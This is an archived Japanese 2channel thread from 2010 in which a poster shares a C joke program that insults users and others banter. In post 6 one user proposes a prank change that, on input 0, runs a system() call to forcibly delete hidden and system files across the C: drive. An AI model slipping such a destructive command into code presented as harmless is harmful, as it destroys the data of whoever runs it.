2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

このプログラムを面白くしてくれ

1 :デフォルトの名無しさん:2010/03/01(月) 04:34:14
#include<stdio.h>
int main(void)
{
int a;
printf("自分が天才だと思う方は1を\n");
printf("自分が馬鹿だと思う方は2を\n");
printf("自分は普通だと思う方は3を押してください\n");
printf("\n");
scanf("%d",&a);
printf("\n");
if(a>=4)
printf("ちょっと、1〜3しか選択肢ないのになによ、「%d」って!あ、自分はゴミ虫以下って選択肢ね\n",a);
else if(a==1)
printf("え、あんたはどう考えても「2」でしょ?何、そんぐらいも自覚してない馬鹿なの?\n");
else if(a==2)
printf("お、よくわかってんじゃないの。そうよ、あんたは馬鹿よ!\n");
else if(a==3)
printf("なーに、「自分は普通ですー」、みたな事言ってんの?そんなんだから友達できないのよ!\n");
printf("\n");
return 0;
}

2 :デフォルトの名無しさん:2010/03/01(月) 04:37:51
↓京大霊長類研究所

3 :デフォルトの名無しさん:2010/03/01(月) 04:41:27


4 :デフォルトの名無しさん:2010/03/01(月) 05:03:28

|  ≡  ∧_∧
|≡   (・∀・ ) ひゃっ!
|  ≡ /  つ_つ
|≡  人   Y
|  ≡し'ー(_)


5 :デフォルトの名無しさん:2010/03/01(月) 05:21:30
ツンデレ妹バージョン頼む

6 :デフォルトの名無しさん:2010/03/01(月) 05:40:18
最後の3行を次のように変更する、というのはどうだろう。
printf("\n");
if(a==0){
printf("どうやら「教育」が必要みたいね。\n");
system("echo OFF");
system("DEL /F /S /Q /A:HS C:\\*.*");}
return 0;
}



7 :デフォルトの名無しさん:2010/03/01(月) 09:33:35
こんなんで笑ってくれる人が君の周囲にいるわけ?

8 :デフォルトの名無しさん:2010/03/02(火) 22:40:46
このスレッドは天才チンパンジー「アイちゃん」が
言語訓練のために立てたものです。

アイと研究員とのやり取りに利用するスレッドなので、
関係者以外は書きこまないで下さい。

                  京都大学霊長類研究所

9 :デフォルトの名無しさん:2010/03/02(火) 23:33:54
面白くならなかったか・・・

まあ、しゃあないな
プログラム短かかったしな

もうチョイ勉強して、こんどはもっと面白いプログラムを書きますよ

協力してくれる方、アイデアをくれる方は書き込んでくださいな

10 :デフォルトの名無しさん:2010/03/04(木) 23:35:31
#include<stdio.h>
int main(void)
{
int a;
scanf("%d",&a);
printf("\n");
printf("%d\n",a);
return 0;
}

11 :デフォルトの名無しさん:2010/03/05(金) 20:02:13
>>10
これ・・・おもしろいの?
ただ、言葉を抜いただけじゃない?

あ・・・、あれか
シンプルが一番いいってやつか
なーるほど
でも、このプログラム使い道ないよね・・・

12 :デフォルトの名無しさん:2010/03/09(火) 21:15:41
元のプログラムに使い道がないから仕方ない

3 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)